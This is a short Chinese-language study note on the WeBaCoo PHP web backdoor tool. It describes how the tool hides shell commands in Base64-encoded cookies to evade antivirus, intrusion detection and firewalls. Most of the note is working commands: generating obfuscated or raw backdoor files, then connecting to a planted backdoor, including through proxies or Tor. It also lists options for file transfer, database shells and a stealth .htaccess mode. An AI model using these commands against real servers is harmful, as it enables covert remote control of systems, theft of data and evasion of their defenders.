PHP WeBaCoo后門學習筆記

PHP WeBaCoo后門學習筆記 - PHP WeBaCoo backdoor learning notes

　　WeBaCoo （Web Backdoor Cookie） 是一款隱蔽的腳本類Web后門工具。設計理念是躲避AV、NIDS、IPS、網絡防火牆和應用防火牆的查殺，提供混淆和原始兩種后門代碼（原始代碼較難檢測）。WebBaCoo 使用HTTP響應頭傳送命令執行的結果，Shell命令經過Base64編碼后隱藏在Cookie頭中。

安裝：

官網：http://sbechtsoudis.com/archiive/webacoo/index.html

kali linux下默認位於：/usr/bin 目錄下

使用git安裝：git clone git://github.com/anestisb/WeBaCoo.git

 

常見使用方法：

生成模式（后門生成）：

1、使用默認配置生成模糊后門代碼：

webacoo -g -o backdoor.php #backdoor.php為自定義后門文件名

2、使用exec有效載荷生成混淆后門代碼：

webacoo -g -o backdoor.php -f 3  #backdoor.php為自定義后門文件名 3表示exec方法

3、使用popen有效載荷生成原始后門代碼：

webacoo -g -o backdoor.php -f 5 -r #backdoor為自定義后門文件名 5表示popen方法

終端模式（后門利用）：

1、使用默認配置訪問服務器：

webacoo -t -u http://xxx/backdoor.php #-u 后門路徑

2、使用“Cookie-name”作為Cookie名稱、“TtT”作為分隔符訪問服務器：

webacoo -t -u http://xxx/backdoor.php -c "Cookie-name" -d "TtT" #Cookie-name 與 TtT 為自定義內容

3、使用一般代理：

webacoo -t -u http://xxx/backdoor.php -c "Cookie-name" -d "TtT" -p XX.XX.XX.XX:XXXX #Cookie-name 與 TtT 為自定義內容 XX替換為相應的ip和端口號

4，使用tor代理：

webacoo -t -u http://xxx/backdoor.php -c "Cookie-name" -d "TtT" -p tor #Cookie-name 與 TtT 為自定義內容

參數解釋：

-f FUNCTION ：使用PHP系統函數 system、shell_exec、exec、passthru、popen ，按順序FUNCTION分別為數字1、2、3、4、5

-g：生成后門

-o：指定生成的后門文件名

-u URL：后門路徑

-e CMD：單獨命令執行模式 需要添加 -t 和 -u參數

-m METHOD：選擇HTTP請求方式，默認為GET

-c COOKIE：Cookie的名字，默認為：M-cookie

-d DELIM：指定分隔符 默認為隨機

-p PROXY：使用代理

-v LEVEL：打印的詳細程度。默認0 無附加信息，1打印HTTP頭，2打印HTTP頭和數據

-h：顯示幫助文件並退出

-update：更新

mysql-cli：MySQL命令行模式

psql-cli：Postgres命令行模式

upload 使用POST上傳文件

download：下載文件

stealth：通過.htaccess 處理增加的隱形模塊